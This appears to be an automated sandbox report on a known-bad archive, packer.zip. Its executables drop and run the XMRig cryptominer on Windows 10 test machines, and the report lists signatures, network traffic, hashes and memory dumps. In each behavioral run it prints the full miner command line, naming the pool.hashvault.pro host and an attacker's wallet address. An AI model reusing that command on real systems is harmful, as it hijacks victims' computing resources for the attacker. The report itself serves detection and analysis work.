Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Suspicious behavior: LoadsDriver
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-20 15:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 15:11
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2712 wrote to memory of 2024 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2712 wrote to memory of 2024 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4488,i,13035806169561352434,1332896185314862791,262144 --variations-seed-version --mojo-platform-channel-handle=3812 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,13035806169561352434,1332896185314862791,262144 --variations-seed-version --mojo-platform-channel-handle=4168 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.177.190.20.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2024-16-0x0000024769B80000-0x0000024769BA0000-memory.dmp
memory/2024-17-0x0000024769EE0000-0x0000024769F00000-memory.dmp
memory/2024-18-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-19-0x0000024769F00000-0x0000024769F20000-memory.dmp
memory/2024-20-0x000002476B6E0000-0x000002476B700000-memory.dmp
memory/2024-21-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-22-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-23-0x0000024769F00000-0x0000024769F20000-memory.dmp
memory/2024-25-0x000002476B6E0000-0x000002476B700000-memory.dmp
memory/2024-24-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-26-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-27-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-28-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-29-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-30-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-31-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-32-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-33-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-34-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-35-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-36-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-37-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-38-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-39-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-40-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-41-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-42-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-43-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-44-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-45-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-46-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-47-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-48-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-49-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-50-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-51-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-52-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-53-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-54-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-55-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-56-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-57-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-58-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-59-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-60-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-61-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-62-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-63-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-64-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-65-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-66-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-67-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-68-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-69-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-70-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-71-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-72-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-73-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-74-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-75-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-76-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-77-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-78-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-79-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-80-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-81-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-82-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-83-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-84-0x00007FF780D10000-0x00007FF781813000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 15:11
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4116 wrote to memory of 1580 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4116 wrote to memory of 1580 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.111.78.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1580-16-0x000001E0A88D0000-0x000001E0A88F0000-memory.dmp
memory/1580-17-0x000001E0A8920000-0x000001E0A8940000-memory.dmp
memory/1580-18-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-19-0x000001E0A8940000-0x000001E0A8960000-memory.dmp
memory/1580-20-0x000001E0A8960000-0x000001E0A8980000-memory.dmp
memory/1580-21-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-22-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-25-0x000001E0A8960000-0x000001E0A8980000-memory.dmp
memory/1580-24-0x000001E0A8940000-0x000001E0A8960000-memory.dmp
memory/1580-23-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-26-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-27-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-28-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-29-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-30-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-31-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-32-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-33-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-34-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-35-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-36-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-37-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-38-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-39-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-40-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-41-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-42-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-43-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-44-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-45-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-46-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-47-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-48-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-49-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-50-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-51-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-52-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-53-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-54-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-55-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-56-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-57-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-58-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-59-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-60-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-61-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-62-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-63-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-64-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-65-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-66-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-67-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-68-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-69-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-70-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-71-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-72-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-73-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-74-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-75-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-76-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-77-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-78-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-79-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-80-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-81-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-82-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-83-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-84-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 15:11
Platform
win10v2004-20240508-en
Max time kernel
1796s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4812 wrote to memory of 4056 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4812 wrote to memory of 4056 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4056-16-0x0000024CFBB40000-0x0000024CFBB60000-memory.dmp
memory/4056-17-0x0000024CFBB80000-0x0000024CFBBA0000-memory.dmp
memory/4056-18-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-20-0x0000024D8E570000-0x0000024D8E590000-memory.dmp
memory/4056-19-0x0000024CFBBA0000-0x0000024CFBBC0000-memory.dmp
memory/4056-21-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-22-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-25-0x0000024D8E570000-0x0000024D8E590000-memory.dmp
memory/4056-24-0x0000024CFBBA0000-0x0000024CFBBC0000-memory.dmp
memory/4056-23-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-26-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-27-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-28-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-29-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-30-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-31-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-32-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-33-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-34-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-35-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-36-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-37-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-38-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-39-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-40-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-41-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-42-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-43-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-44-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-45-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-46-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-47-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-48-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-49-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-50-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-51-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-52-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-53-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-54-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-55-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-56-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-57-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-58-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-59-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-60-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-61-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-62-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-63-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-64-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-65-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-66-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-67-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-68-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-69-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-70-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-71-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-72-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-73-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-74-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-75-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-76-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
